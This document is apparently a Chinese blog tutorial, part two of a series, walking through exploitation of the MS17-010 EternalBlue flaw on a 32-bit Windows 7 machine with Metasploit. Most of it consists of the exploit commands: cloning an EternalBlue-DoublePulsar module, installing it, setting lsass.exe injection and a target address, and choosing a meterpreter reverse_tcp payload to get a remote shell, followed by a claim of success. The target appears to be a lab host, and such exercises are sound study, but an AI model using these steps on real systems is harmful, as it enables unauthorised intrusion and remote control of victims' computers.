MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位(二)

简介: MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

注意事项


64位Linux一般会自带一个Wine,名字是wine64,注意Wine32安装之后的名字是wine而非wine32。(可能有些系统会不同但几率不大)


附上卸载i386的方法


dpkg --remove-architecture i386


可能缺少多架构支持,所以我们安装多架构支持,所以安装win 32


安装攻击32位操作系统所用的的脚本

首先下载利用的脚本:


git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

20190606205545496.png


下载下来之后要记得解压


8363223ad573436e93b0796dc4b9867a.png


然后将脚本拷贝到  /usr/share/metasploit-framework/modules/exploits/windows/smb


cd Eternalblue-Doublepulsar-Metasploit/
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb


e7345d20a4414155be541877903a50b1.png


如上图所示,脚本下载并复制到SMB目录下成功

8.接下来我们使用exploit模块(步骤同上,原理同上)------已知靶机是32位的操作系统,我们用常32位的脚本来入侵操作系统


msfconsole
search eternalblue  #或者search ms17-010


aba9930db4374e6d920e016f3de8488c.png


3c339aded21f43158f97375caa393715.png

use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.1.9


94753af257714fb7a0e342ecc7183420.png

show options   #查看设置的参数

457440a57e404031ae957daae69fd33e.png


设置payloads,特别注意和之前的payloads不同(去掉中间的X86,否则会失败)

set payload windows/meterpreter/reverse_tcp
exploit  #或者run   开始攻击,反弹shell


拓展:


第一种交互式shellpayload设置方法:set payload windows/meterpreter/reverse_tcp  (注意:此处的payload里面去掉X86,不然链接不成功)


第二种反弹式shellpayload设置方法:set payload windows/shell/reverse_tcp  (注意:此处的payload里面去掉X86,不然链接不成功)


25776383dd1649b79770d2f137a9029b.png


如下图所示,攻击成功,反弹出shell ,可移执行windows 7 的系统命令


查看到靶机的IP地址,还可以执行更多的命令..........


5833b309476d48fc855dc2d79ae92915.png



相关文章
|
1月前
|
数据安全/隐私保护 Windows
安装 Windows Server 2019
安装 Windows Server 2019
|
1月前
|
Windows
安装 Windows Server 2003
安装 Windows Server 2003
|
1月前
|
NoSQL Shell MongoDB
Windows 平台安装 MongoDB
10月更文挑战第10天
46 0
Windows 平台安装 MongoDB
|
1月前
|
Windows Python
Windows安装dlib,遇到问题汇总解决
Windows安装dlib,遇到问题汇总解决
47 4
|
1月前
|
Oracle 关系型数据库 MySQL
Mysql(1)—简介及Windows环境下载安装
MySQL 是一个流行的关系型数据库管理系统(RDBMS),基于 SQL 进行操作。它由瑞典 MySQL AB 公司开发,后被 Sun Microsystems 收购,现为 Oracle 产品。MySQL 是最广泛使用的开源数据库之一,适用于 Web 应用程序、数据仓库和企业应用。
55 2
|
1月前
|
JavaScript Windows
windows安装vue
windows安装vue
|
1月前
|
应用服务中间件 Apache Windows
免安装版的Tomcat注册为windows服务
免安装版的Tomcat注册为windows服务
120 3
|
1月前
|
Linux 网络安全 虚拟化
适用于Linux的Windows子系统(WSL1)的安装与使用记录
并放到启动文件夹,就可以开机自动启动了。
48 0
|
1月前
|
Windows
安装Windows XP系统
安装Windows XP系统
|
1月前
|
Ubuntu Linux 开发工具
windows11安装WLS2+Ubuntu
windows11安装WLS2+Ubuntu